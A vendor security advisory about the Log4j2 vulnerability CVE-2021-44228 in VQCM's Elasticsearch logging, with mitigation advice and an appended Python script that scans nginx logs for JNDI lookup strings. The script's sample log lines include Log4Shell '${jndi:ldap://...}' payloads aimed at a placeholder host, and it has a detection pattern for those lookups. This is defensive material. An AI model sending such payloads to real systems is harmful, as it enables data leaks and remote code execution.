Over the weekend a critical security issue impacting Log4j2 (CVE-2021-44228), and all products which use it as a dependency, became public. This is a critical-severity CVE and needs to be treated as such by any company which is even potentially impacted. As the VQCM virtual machine uses Elasticsearch (ES) for logging, this issue impacts our products (Kibana is currently listed as not impacted). Due to the nature of the vulnerability and the extensive logging that VQCM provides, any publicly exposed component of the VQCM becomes a potential attack surface. This includes the VQCM API / UI, as even a failed login can be used to deliver a crafted log message that reaches the underlying ES logging.
By default, our product firewall settings block access to the ES port and we recommend that this port is blocked if you have previously opened it. If you have made your VQCM API / UI publicly accessible we recommend removing this public access by placing it behind your own firewall(s) or stopping the exposed service / route.
It is important to note that, as per the current Elasticsearch security announcements, ES is not at risk of a remote code execution attack; however, it remains at risk of an information leak.
As such we strongly advise all customers to immediately block publicly exposed elements of the VQCM instance. We are currently working on a mitigation (seen here – https://www.elastic.co/guide/en/elasticsearch/reference/7.16/advanced-configuration.html#set-jvm-options) for this issue following the security announcements from Elasticsearch themselves, which we are hoping to get out to customers as soon as we have finished in-house security testing. The upcoming release of 3.9 (expected release date 17/01/2022) will include a fixed version of the Elasticsearch instance.
Customers who are concerned and want to make sure their instance has not been impacted should check their web traffic logs (nginx) for the following keyword: "jndi:ldap". If customers are unsure how to do this, please carry out a log dump and make it available to us via our support team. Customers finding positive hits for this will need to assume that there has been an information leak from their VQCM instance and should take appropriate action.
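The nginx log check described above, as an added example written for this advisory rather than VQCM's own tooling: it scans access log lines for the "jndi:ldap" keyword, and goes slightly beyond the advisory's instruction by matching case-insensitively, percent-decoding the request path so an encoded lookup string is still seen, and also flagging the ldaps and rmi schemes. The log lines are constructed samples, the log format is assumed to be the nginx default "combined" format, and the host names are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access log lines (not real traffic): one benign
# failed login, one with the lookup string in the User-Agent, and one with
# it percent-encoded in the request path.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Dec/2021:08:15:02 +0000] "POST /api/login HTTP/1.1" 401 93 "-" "Mozilla/5.0"
203.0.113.11 - - [11/Dec/2021:08:16:40 +0000] "POST /api/login HTTP/1.1" 401 93 "-" "${jndi:ldap://placeholder.invalid/a}"
203.0.113.12 - - [11/Dec/2021:08:17:05 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
"""

# Assumption: besides the advisory's keyword "jndi:ldap" we also flag the
# ldaps and rmi schemes, which use the same lookup mechanism.
JNDI_PATTERN = re.compile(r"jndi:(?:ldaps?|rmi)", re.IGNORECASE)


def normalise(line: str) -> str:
    """Percent-decode twice so single- or double-encoded lookup strings in
    the request path appear in clear text before matching."""
    return unquote(unquote(line))


def find_jndi_hits(log_text: str):
    """Return (line_number, client_ip, decoded_line) for each line that
    contains a JNDI lookup string anywhere (path, referer or User-Agent)."""
    hits = []
    for n, raw in enumerate(log_text.splitlines(), start=1):
        decoded = normalise(raw)
        if JNDI_PATTERN.search(decoded):
            client_ip = raw.split(" ", 1)[0]  # first field of combined format
            hits.append((n, client_ip, decoded))
    return hits


def scan_file(path: str):
    """Scan an nginx access log on disk, e.g. /var/log/nginx/access.log."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_jndi_hits(fh.read())


if __name__ == "__main__":
    for n, ip, line in find_jndi_hits(SAMPLE_LOG):
        print(f"line {n} from {ip}: {line}")
```

Any hit should be treated as the advisory says: assume an information leak from the instance and take appropriate action.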
Our support team is on hand for customers who wish to discuss this and would like additional information or help.